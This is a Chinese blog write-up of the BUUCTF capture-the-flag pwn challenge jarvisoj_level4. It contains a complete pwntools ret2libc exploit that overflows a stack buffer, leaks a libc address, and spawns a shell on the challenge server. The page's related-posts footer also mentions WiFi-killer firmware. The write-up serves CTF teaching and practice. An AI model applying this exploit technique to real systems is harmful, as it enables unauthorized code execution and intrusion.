[BUUCTF]PWN--------jarvisoj_level4

最新推荐文章于 2023-04-08 14:44:07 发布
最新推荐文章于 2023-04-08 14:44:07 发布
阅读量294 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BangSen1/article/details/115407402
版权

jarvisoj_level4

例行检查,32位,开启NX保护
在这里插入图片描述
运行一下
在这里插入图片描述
用IDA打开。查看主函数
在这里插入图片描述
查看vulnerable_function()函数
在这里插入图片描述
buf存在溢出漏洞。
是一道ret2libc类型的题目。
利用第一次溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回重新执行主函数。
再利用第二次栈溢出跳转执行system("/bin/sh")


from pwn import *
from LibcSearcher import *

context(os = "linux", arch = "i386", log_level= "debug")
p = remote("node3.buuoj.cn", 25659)
elf = ELF("./level4")
#获取函数在表里的位置
read_got = elf.got["read"]
write_plt = elf.plt["write"]
main_addr = elf.symbols["main"]

#构造第一个payload
payload = 'a' * (0x88+4) + p32(write_plt)
payload += p32(main_addr)
payload += p32(1) + p32(read_got) + p32(4)

p.sendline(payload)

#接收并计算出它们在libc库里的地址
read_addr = u32(p.recvuntil("\xf7")[-4:])
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")
#构造第二个payload

payload = 'a' * (0x88+4)+ p32(system_addr)
payload += p32(main_addr)
payload += p32(binsh_addr)
p.sendline(payload)

p.interactive()

在这里插入图片描述

HAIANAWEI
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF-pwn]——jarvisoj_level4
Y_peak的博客
02-22 196
[BUUCTF-pwn]——jarvisoj_level4 点我看 write up exploit from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26929) elf = ELF("./level4") write_plt = elf.plt['write'] write_got = elf.got['write'] main_addr = elf.sym['main'] payload = 'a' *
jarvisoj_level4
个人笔记
04-08 121
思路:ret2libc,泄露_write来获取Libc基址。3,IDA静态查看是否有ret利用点。
BUUCTF-jarvisoj_level4
Rt1Text的博客
12-04 154
很明显的栈溢出,没有system(bin/sh) 32位的ret2libc3老规矩的脚本
Jarvis OJ Level4
qq_39153421的博客
09-19 361
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数的栈。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
Jarvis OJ --level4
Kni9hT's Blog
11-11 227
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 224
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 382
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Bugku S3 AWD排位赛-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位赛-9 pwn二进制
BUUCTF jarvisoj_level3
红叶的博客
10-27 305
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
Jarvis OJ-Level4
weixin_30462049的博客
05-16 92
借助DynELF实现无libc的漏洞利用小结 #!/usr/bin/env python # coding:utf-8 from pwn import * elf = ELF('level4') write_plt = p32(elf.symbols['write']) start_addr = p32(elf.symbols['_start']) rea...
JarvisOJ level4
PLpa的博客
07-08 2207
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
BUUCTFjarvisoj_level4(write up)
qq_44768749的博客
08-24 835
这里写目录标题0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、部分RELRO保护 0x02 运行 简单的输入一个字符串 0x03 IDA 漏洞点在vulnerable_function输入长度可以造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 第二次栈溢出跳转执行system("/bin/
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4111
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值